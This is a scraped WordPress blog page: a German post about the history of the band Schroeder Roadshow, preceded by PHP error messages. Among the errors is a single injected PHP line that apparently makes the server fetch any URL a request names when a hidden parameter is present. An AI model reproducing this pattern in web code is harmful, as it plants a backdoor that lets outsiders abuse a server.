Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 520

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 535

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 542

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 578

Deprecated: Function set_magic_quotes_runtime() is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 18
isset($_REQUEST['kocopu']) && fetch_feed($_REQUEST['feed_url']);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26
Schroeder Roadshow » Das war echt Kult!

Das war echt Kult!

Schroeder am 20. Oktober 2008

Mit ihrer genialen Mischung aus Rock-Konzert, herausfordernder Provokation, Musik-Kabarett und einer gehörigen Portion Clownerie sorgten Schroeder Roadshow für ausverkaufte Konzerte in Schul-/Uni-Aulen und in autonomen Jugendzentren. Sie gaben dem Protest der Jugend gegen die gutbürgerliche Gesellschaft einen Namen und eine Bühne. Die Musik, die Texte, die Cover und Konzertposter des Karikaturisten K. H. Schrörs, die Bühnenshow - das alles kam in der Szene damals an.

Der Undergrounddichter Uli Hundt gründete zusammen mit Bassist Rich Schwab, Gitarrist Gerd Beracz, Saxofonist Jesus Canneloni und Schlagzeuger Richard Herten die Band, benannt nach dem Pianisten aus der Comicserie „Die Peanuts“. Nach dem Besuch einer Show des Clowns Jango Edwards und dessen Friends Roadshow in einem Kölner Programmkino stand das weitere Konzept fest: anarchischer Humor, deftige Show und Respekt vor nichts und niemandem. Die Schroeder Roadshow war geboren.

Der Durchbruch kam mit ihrem zweiten Album „Anarchie in Germoney“ Ende 1978. Zur Tour fiel Mastermind Uli Hundt wegen einer Nierenerkrankung aus und mit dem 22jährigen Altenpfleger Gerd Köster (manchen besser bekannt als einer der Köpfe von „The Piano Has Been Drinking“) wurde damals der perfekte Frontmann für die Band gefunden. In den 1980er Jahren folgten fast 800 Auftritte auf Tourneen, Rock-Gegen-Rechts, der Friedensbewegung und beim ANTI-WAA in Wackersdorf vor 100.000 Leuten.

1984 verließen Uli Hundt und Rich Schwab die Band. Der damalige Schlusspunkt war der Auftritt beim legendären Werner-Rennen des Comic-Zeichners Brösel (Rötger Feldmann) vor 200.000 Menschen.

Abgelegt unter Schroeder | Keine Kommentare

Trackback URI | Kommentare als RSS

Einen Kommentar schreiben